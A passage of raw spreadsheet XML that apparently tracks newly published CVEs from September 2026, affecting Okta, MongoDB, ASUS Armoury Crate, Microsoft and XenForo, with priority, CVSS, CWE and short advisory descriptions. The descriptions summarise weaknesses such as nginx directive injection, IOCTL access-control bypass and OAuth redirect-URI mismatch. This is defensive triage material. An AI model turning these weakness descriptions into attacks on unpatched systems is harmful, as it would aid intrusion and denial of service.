This issue affects ash_ai: from 0.1.0 before 1.0.3.</t></is></c><c r="T1198" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78230</t></is></c></row><row r="1199"><c r="A1199" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1199" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1199" s="5" t="inlineStr"><is><t>CVE-2026-78552</t></is></c><c r="D1199" s="5" t="n"><v>6</v></c><c r="E1199" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1199" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1199" s="5" t="inlineStr" /><c r="H1199" s="5" t="n"><v>0.003</v></c><c r="I1199" s="5" t="inlineStr" /><c r="J1199" s="5" t="inlineStr"><is><t>nginx, okta</t></is></c><c r="K1199" s="5" t="inlineStr" /><c r="L1199" s="5" t="inlineStr" /><c r="M1199" s="5" t="inlineStr" /><c r="N1199" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1199" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1199" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1199" s="5" t="inlineStr" /><c r="R1199" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S1199" s="5" t="inlineStr"><is><t>The Okta Access Gateway does not apply its Lua directive restriction to the application-level custom configuration field. The field is interpolated directly into the nginx server block without inspection, resulting in execution of injected directives.</t></is></c><c r="T1199" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78552</t></is></c></row><row r="1200"><c r="A1200" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1200" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1200" s="5" t="inlineStr"><is><t>CVE-2026-78622</t></is></c><c r="D1200" s="5" t="n"><v>6</v></c><c r="E1200" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1200" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1200" s="5" t="inlineStr" /><c r="H1200" s="5" t="n"><v>0.001</v></c><c r="I1200" s="5" t="inlineStr" /><c r="J1200" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1200" s="5" t="inlineStr" /><c r="L1200" s="5" t="inlineStr" /><c r="M1200" s="5" t="inlineStr" /><c r="N1200" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1200" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1200" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1200" s="5" t="inlineStr" /><c r="R1200" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="S1200" s="5" t="inlineStr"><is><t>The Okta Verify for Windows uninstaller does not verify whether the user data directory is a filesystem junction before deleting its contents with elevated privileges. The delete operation follows the junction target, resulting in recursive deletion of unintended directory contents.</t></is></c><c r="T1200" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78622</t></is></c></row><row r="1201"><c r="A1201" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1201" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1201" s="5" t="inlineStr"><is><t>CVE-2026-82056</t></is></c><c r="D1201" s="5" t="n"><v>6</v></c><c r="E1201" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1201" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G1201" s="5" t="inlineStr" /><c r="H1201" s="5" t="n"><v>0.002</v></c><c r="I1201" s="5" t="inlineStr" /><c r="J1201" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1201" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1201" s="5" t="inlineStr" /><c r="M1201" s="5" t="inlineStr" /><c r="N1201" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1201" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1201" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1201" s="5" t="inlineStr" /><c r="R1201" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1201" s="5" t="inlineStr"><is><t>A race condition in MongoDB server's text index query parsing can cause a heap use-after-free read when handling upsert retry paths. Under certain concurrent index lifecycle operations, a raw pointer to internal text index metadata may be dereferenced after the underlying structures have been freed, leading to a server crash. An authenticated user with readWrite privileges can trigger this condition through specific concurrent text-search and index management operations, resulting in denial of service for all connected clients. This</t></is></c><c r="T1201" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82056</t></is></c></row><row r="1202"><c r="A1202" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1202" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1202" s="5" t="inlineStr"><is><t>CVE-2026-82063</t></is></c><c r="D1202" s="5" t="n"><v>6</v></c><c r="E1202" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1202" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G1202" s="5" t="inlineStr" /><c r="H1202" s="5" t="n"><v>0.003</v></c><c r="I1202" s="5" t="inlineStr" /><c r="J1202" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1202" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1202" s="5" t="inlineStr" /><c r="M1202" s="5" t="inlineStr" /><c r="N1202" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1202" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1202" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1202" s="5" t="inlineStr" /><c r="R1202" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1202" s="5" t="inlineStr"><is><t>A use-after-free security issue in the cursor management component of MongoDB Server allows an authenticated user to cause a denial of service. Under specific timing conditions during cursor operations, a stale pointer to a freed resource may be retained and subsequently dereferenced during cursor cleanup, leading to a server process crash.</t></is></c><c r="T1202" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82063</t></is></c></row><row r="1203"><c r="A1203" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1203" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1203" s="5" t="inlineStr"><is><t>CVE-2026-16004</t></is></c><c r="D1203" s="5" t="n"><v>5.9</v></c><c r="E1203" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1203" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1203" s="5" t="inlineStr" /><c r="H1203" s="5" t="n"><v>0.001</v></c><c r="I1203" s="5" t="inlineStr" /><c r="J1203" s="5" t="inlineStr" /><c r="K1203" s="5" t="inlineStr" /><c r="L1203" s="5" t="inlineStr" /><c r="M1203" s="5" t="inlineStr" /><c r="N1203" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1203" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1203" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1203" s="5" t="inlineStr" /><c r="R1203" s="5" t="inlineStr"><is><t>CWE-782</t></is></c><c r="S1203" s="5" t="inlineStr"><is><t>Exposed IOCTL with Insufficient Access Control in Armoury Crate driver allows a local user to read and write arbitrary PCI/PCIe configuration space via crafted IOCTL requests by bypassing the driver's verification.
Refer to the '
Security Update for Armoury Crate App' section on the ASUS Security Advisory for more information.</t></is></c><c r="T1203" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16004</t></is></c></row><row r="1204"><c r="A1204" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1204" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1204" s="5" t="inlineStr"><is><t>CVE-2026-69304</t></is></c><c r="D1204" s="5" t="n"><v>5.9</v></c><c r="E1204" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1204" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1204" s="5" t="inlineStr" /><c r="H1204" s="5" t="n"><v>0.008</v></c><c r="I1204" s="5" t="inlineStr" /><c r="J1204" s="5" t="inlineStr" /><c r="K1204" s="5" t="inlineStr" /><c r="L1204" s="5" t="inlineStr" /><c r="M1204" s="5" t="inlineStr" /><c r="N1204" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1204" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1204" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1204" s="5" t="inlineStr" /><c r="R1204" s="5" t="inlineStr"><is><t>CWE-409</t></is></c><c r="S1204" s="5" t="inlineStr"><is><t>Improper handling of highly compressed data (data amplification) in ASP.NET Core allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T1204" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69304</t></is></c></row><row r="1205"><c r="A1205" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1205" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1205" s="5" t="inlineStr"><is><t>CVE-2026-69382</t></is></c><c r="D1205" s="5" t="n"><v>5.9</v></c><c r="E1205" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1205" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1205" s="5" t="inlineStr" /><c r="H1205" s="5" t="n"><v>0.004</v></c><c r="I1205" s="5" t="inlineStr" /><c r="J1205" s="5" t="inlineStr" /><c r="K1205" s="5" t="inlineStr" /><c r="L1205" s="5" t="inlineStr" /><c r="M1205" s="5" t="inlineStr" /><c r="N1205" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1205" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1205" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1205" s="5" t="inlineStr" /><c r="R1205" s="5" t="inlineStr"><is><t>CWE-327</t></is></c><c r="S1205" s="5" t="inlineStr"><is><t>Use of a broken or risky cryptographic algorithm in Microsoft Exchange Server allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1205" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69382</t></is></c></row><row r="1206"><c r="A1206" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1206" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1206" s="5" t="inlineStr"><is><t>CVE-2026-70091</t></is></c><c r="D1206" s="5" t="n"><v>5.9</v></c><c r="E1206" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1206" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1206" s="5" t="inlineStr" /><c r="H1206" s="5" t="n"><v>0.007</v></c><c r="I1206" s="5" t="inlineStr" /><c r="J1206" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1206" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1206" s="5" t="inlineStr" /><c r="M1206" s="5" t="inlineStr" /><c r="N1206" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1206" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1206" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1206" s="5" t="inlineStr" /><c r="R1206" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="S1206" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows DNS allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T1206" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70091</t></is></c></row><row r="1207"><c r="A1207" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1207" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1207" s="5" t="inlineStr"><is><t>CVE-2026-72978</t></is></c><c r="D1207" s="5" t="n"><v>5.9</v></c><c r="E1207" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1207" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1207" s="5" t="inlineStr" /><c r="H1207" s="5" t="n"><v>0.008</v></c><c r="I1207" s="5" t="inlineStr" /><c r="J1207" s="5" t="inlineStr" /><c r="K1207" s="5" t="inlineStr" /><c r="L1207" s="5" t="inlineStr" /><c r="M1207" s="5" t="inlineStr" /><c r="N1207" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1207" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1207" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1207" s="5" t="inlineStr" /><c r="R1207" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="S1207" s="5" t="inlineStr"><is><t>Allocation of resources without limits or throttling in Active Directory Federation Services (AD FS) allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T1207" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72978</t></is></c></row><row r="1208"><c r="A1208" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1208" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1208" s="5" t="inlineStr"><is><t>CVE-2026-73310</t></is></c><c r="D1208" s="5" t="n"><v>5.9</v></c><c r="E1208" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1208" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1208" s="5" t="inlineStr" /><c r="H1208" s="5" t="n"><v>0.004</v></c><c r="I1208" s="5" t="inlineStr" /><c r="J1208" s="5" t="inlineStr" /><c r="K1208" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L1208" s="5" t="inlineStr" /><c r="M1208" s="5" t="inlineStr" /><c r="N1208" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1208" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1208" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1208" s="5" t="inlineStr" /><c r="R1208" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S1208" s="5" t="inlineStr"><is><t>XenForo before 2.3.13 contains an authorization flaw in the OAuth2 token endpoint that allows attackers controlling any allowlisted redirect URI to bypass redirect URI binding by submitting a different allowlisted URI than the one recorded at authorization time. Attackers can exchange an intercepted authorization code using a mismatched redirect URI to steal OAuth2 tokens from intercepted authorization flows.</t></is></c><c r="T1208" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73310</t></is></c></row><row r="1209"><c r="A1209" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1209" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1209" s="5" t="inlineStr"><is><t>CVE-2026-75809</t></is></c><c r="D1209" s="5" t="n"><v>5.9</v></c><c r="E1209" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1209" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1209" s="5" t="inlineStr" /><c r="H1209" s="5" t="n"><v>0.001</v></c><c r="I1209" s="5" t="inlineStr" /><c r="J1209" s="5" t="inlineStr" /><c r="K1209" s="5" t="inlineStr" /><c r="L1209" s="5" t="inlineStr" /><c r="M1209" s="5" t="inlineStr" /><c r="N1209" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1209" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1209" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1209" s="5" t="inlineStr" /><c r="R1209" s="5" t="inlineStr"><is><t>CWE-782</t></is></c><c r="S1209" s="5" t="inlineStr"><is><t>Exposed IOCTL with insufficient access control in ASUS Armoury Crate allows a local user to disclosure information and disabling device functionality by bypassing driver authentication and using IOCTLs to read from and write to PCIe configuration space.Refer to the '
Security Update for Armoury Crate App ' section on the ASUS Security Advisory for more information.</t></is></c><c r="T1209" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75809</t></is></c></row><row r="1210"><c r="A1210" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1210" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1210" s="5" t="inlineStr"><is><t>CVE-2026-78620</t></is></c><c r="D1210" s="5" t="n"><v>5.9</v></c><c r="E1210" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1210" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1210" s="5" t="inlineStr" /><c r="H1210" s="5" t="n"><v>0.003</v></c><c r="I1210" s="5" t="inlineStr" /><c r="J1210" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1210" s="5" t="inlineStr" /><c r="L1210" s="5" t="inlineStr" /><c r="M1210" s="5" t="inlineStr" /><c r="N1210" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1210" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1210" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1210" s="5" t="inlineStr" /><c r="R1210" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="S1210" s="5" t="inlineStr"><is><t>The Okta Access Gateway Kerberos configuration handler does not validate file paths specified in event payloads before writing file contents. The path from the event payload is used directly as the write destination, resulting in files being written to unintended locations on the appliance filesystem.</t></is></c><c r="T1210" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78620</t></is></c></row><row r="1211"><c r="A1211" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1211" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1211" s="5" t="inlineStr"><is><t>CVE-2026-16005</t></is></c><c r="D1211" s="5" t="n"><v>5.8</v></c><c r="E1211" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1211" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1211" s="5" t="inlineStr" /><c r="H1211" s="5" t="n"><v>0.001</v></c><c r="I1211" s="5" t="inlineStr" /><c r="J1211" s="5" t="inlineStr" /><c r="K1211" s="5" t="inlineStr" /><c r="L1211" s="5" t="inlineStr" /><c r="M1211" s="5" t="inlineStr" /><c r="N1211" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1211" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1211" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1211" s="5" t="inlineStr" /><c r="R1211" s="5" t="inlineStr"><is><t>CWE-763</t></is></c><c r="S1211" s="5" t="inlineStr"><is><t>Release of Invalid Pointer or Reference in Armoury Crate driver allows a local user to free arbitrary memory via a crafted IOCTL request by bypassing the driver's verification, which can corrupt data structures and cause a system crash (BSOD).Refer to the '
Security Update for Armoury Crate App  ' section on the ASUS Security Advisory for more information.</t></is></c><c r="T1211" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16005</t></is></c></row><row r="1212"><c r="A1212" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1212" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1212" s="5" t="inlineStr"><is><t>CVE-2026-69559</t></is></c><c r="D1212" s="5" t="n"><v>5.8</v></c><c r="E1212" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1212" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1212" s="5" t="inlineStr" /><c r="H1212" s="5" t="n"><v>0.003</v></c><c r="I1212" s="5" t="inlineStr" /><c r="J1212" s="5" t="inlineStr" /><c r="K1212" s="5" t="inlineStr" /><c r="L1212" s="5" t="inlineStr" /><c r="M1212" s="5" t="inlineStr" /><c r="N1212" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1212" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1212" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1212" s="5" t="inlineStr" /><c r="R1212" s="5" t="inlineStr"><is><t>CWE-346</t></is></c><c r="S1212" s="5" t="inlineStr"><is><t>Origin validation error in Microsoft Teams for Android allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1212" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69559</t></is></c></row><row r="1213"><c r="A1213" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1213" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1213" s="5" t="inlineStr"><is><t>CVE-2026-75811</t></is></c><c r="D1213" s="5" t="n"><v>5.8</v></c><c r="E1213" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1213" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1213" s="5" t="inlineStr" /><c r="H1213" s="5" t="n"><v>0.001</v></c><c r="I1213" s="5" t="inlineStr" /><c r="J1213" s="5" t="inlineStr" /><c r="K1213" s="5" t="inlineStr" /><c r="L1213" s="5" t="inlineStr" /><c r="M1213" s="5" t="inlineStr" /><c r="N1213" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1213" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1213" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1213" s="5" t="inlineStr" /><c r="R1213" s="5" t="inlineStr"><is><t>CWE-1256</t></is></c><c r="S1213" s="5" t="inlineStr"><is><t>Improper Restriction of Software Interfaces to Hardware Features in ASUS Armoury Crate allows a local user to modify hardware configuration settings and potentially cause hardware damage by bypassing driver authentication and accessing critical model-specific registers.Refer to the '
Security Update for Armoury Crate App' section on the ASUS Security Advisory for more information.</t></is></c><c r="T1213" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75811</t></is></c></row><row r="1214"><c r="A1214" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1214" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1214" s="5" t="inlineStr"><is><t>CVE-2026-16006</t></is></c><c r="D1214" s="5" t="n"><v>5.7</v></c><c r="E1214" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1214" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1214" s="5" t="inlineStr" /><c r="H1214" s="5" t="n"><v>0.001</v></c><c r="I1214" s="5" t="inlineStr" /><c r="J1214" s="5" t="inlineStr" /><c r="K1214" s="5" t="inlineStr" /><c r="L1214" s="5" t="inlineStr" /><c r="M1214" s="5" t="inlineStr" /><c r="N1214" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1214" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1214" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1214" s="5" t="inlineStr" /><c r="R1214" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S1214" s="5" t="inlineStr"><is><t>Exposure of Sensitive System Information to an Unauthorized Control Sphere in Armoury Crate driver allows a local user to obtain kernel virtual addresses via a crafted IOCTL request by bypassing the driver's verification, potentially providing further insight into the kernel memory layout.Refer to the '
Security Update for Armoury Crate App  ' section on the ASUS Security Advisory for more information.</t></is></c><c r="T1214" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16006</t></is></c></row><row r="1215"><c r="A1215" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1215" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1215" s="5" t="inlineStr"><is><t>CVE-2026-18023</t></is></c><c r="D1215" s="5" t="n"><v>5.7</v></c><c r="E1215" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1215" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1215" s="5" t="inlineStr" /><c r="H1215" s="5" t="n"><v>0.001</v></c><c r="I1215" s="5" t="inlineStr" /><c r="J1215" s="5" t="inlineStr" /><c r="K1215" s="5" t="inlineStr" /><c r="L1215" s="5" t="inlineStr" /><c r="M1215" s="5" t="inlineStr" /><c r="N1215" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1215" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1215" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1215" s="5" t="inlineStr" /><c r="R1215" s="5" t="inlineStr"><is><t>CWE-226</t></is></c><c r="S1215" s="5" t="inlineStr"><is><t>Sensitive Information in Resource Not Removed Before Reuse in ASUS Armoury Crate driver allows a local user to disclose sensitive information from uninitialized memory via a crafted IOCTL request that bypasses the driver's security verification mechanism.
Refer to the '
Security Update for Armoury Crate App ' section on the ASUS Security Advisory for more information.</t></is></c><c r="T1215" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18023</t></is></c></row><row r="1216"><c r="A1216" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1216" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1216" s="5" t="inlineStr"><is><t>CVE-2026-68874</t></is></c><c r="D1216" s="5" t="n"><v>5.7</v></c><c r="E1216" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1216" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1216" s="5" t="inlineStr" /><c r="H1216" s="5" t="n"><v>0.008</v></c><c r="I1216" s="5" t="inlineStr" /><c r="J1216" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K121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16" s="5" t="inlineStr" /><c r="M1216" s="5" t="inlineStr" /><c r="N1216" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1216" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1216" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1216" s="5" t="inlineStr" /><c r="R1216" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1216" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Program Compatibility Assistant Service allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1216" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68874</t></is></c></row><row r="1217"><c r="A1217" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1217" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1217" s="5" t="inlineStr"><is><t>CVE-2026-69317</t></is></c><c r="D1217" s="5" t="n"><v>5.7</v></c><c r="E1217" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1217" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1217" s="5" t="inlineStr" /><c r="H1217" s="5" t="n"><v>0.008</v></c><c r="I1217" s="5" t="inlineStr" /><c r="J1217" s="5" t="inlineStr" /><c r="K1217" s="5" t="inlineStr" /><c r="L1217" s="5" t="inlineStr" /><c r="M1217" s="5" t="inlineStr" /><c r="N1217" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1217" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1217" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1217" s="5" t="inlineStr" /><c r="R1217" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1217" s="5" t="inlineStr"><is><t>Out-of-bounds read in Remote Desktop Client allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1217" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69317</t></is></c></row><row r="1218"><c r="A1218" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1218" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1218" s="5" t="inlineStr"><is><t>CVE-2026-69349</t></is></c><c r="D1218" s="5" t="n"><v>5.7</v></c><c r="E1218" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1218" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1218" s="5" t="inlineStr" /><c r="H1218" s="5" t="n"><v>0.008</v></c><c r="I1218" s="5" t="inlineStr" /><c r="J1218" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K121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18" s="5" t="inlineStr" /><c r="M1218" s="5" t="inlineStr" /><c r="N1218" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1218" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1218" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1218" s="5" t="inlineStr" /><c r="R1218" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1218" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Windows Management Instrumentation allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1218" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69349</t></is></c></row><row r="1219"><c r="A1219" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1219" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1219" s="5" t="inlineStr"><is><t>CVE-2026-69372</t></is></c><c r="D1219" s="5" t="n"><v>5.7</v></c><c r="E1219" s="5" 